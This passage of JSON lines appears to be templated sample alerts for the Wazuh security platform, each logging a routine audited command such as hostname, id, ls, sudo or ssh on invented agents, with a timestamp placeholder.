/usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: 